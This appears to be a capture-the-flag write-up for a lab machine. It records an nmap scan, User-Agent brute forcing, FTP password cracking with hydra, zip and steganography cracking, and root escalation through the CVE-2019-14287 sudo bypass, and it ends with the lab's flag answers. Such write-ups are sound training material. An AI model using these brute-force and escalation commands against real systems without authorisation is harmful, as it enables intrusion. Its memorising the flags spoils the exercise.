You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.
scan the machine
nmap -A -T4 10.10.57.85
it shows 3 open ports 21 (fpt), 22 (ssh), 80 (http)
view the webpage
i found a hint say using your user-agent codename to view the secret (such as agent R)
maybe i will use BurpSuite Intruder to bruteforce user-agent
to use this payload, we need another 2nd payload that run 1 time
i see that a diffent at User-agent: C
it's 302 movement
go there, i found his name is chris
now try to bruteforce fpt password with hydra
hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.57.85
login to ftp server
ftp 10.10.57.85
chris
crystal
ls
get all files to local to process later
mget *
here is a note for agent J
hmm, let's do some forensics with 2 images
binwalk cute-alien.jpg
binwalk cutie.png
hmm i found a zip file in cutie.png
binwalk -e cutie.png
it's unable to unzip the file, so crack it
zip2john 8702.zip > hash
cat hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john --show hash
crack the file
7z x 8702.zip
alien
i found a message to agent R: QXJlYTUx
use that password to crack steg at left image
steghide extract -sf cute-alien.jpg
hmm, i found it's a base64 and after decode, we have Area51 is our real password
so, we got james ssh password is hackerrules!
ssh to the server
ssh [email protected]
hackerrules!
ls
cat user_flag.txt
| Flag | cat user_flag.txt |
|---|---|
| Answer | b03d975e8c92a7c04146cfa7a5a313c7 |
download the image to local for further research
python3 -m http.server
hmm it's an aline image
search with google image and found an acticle about roswell alien autopsy
sudo -l -l
search that vulnerabiliy i found a CVE-2019-14287
and very easy
sudo -u#-1 /bin/bash
also agent R is DesKel
| Flag | root.txt |
|---|---|
| Answer | b53a02f55b57d4439e3341834d70c062 |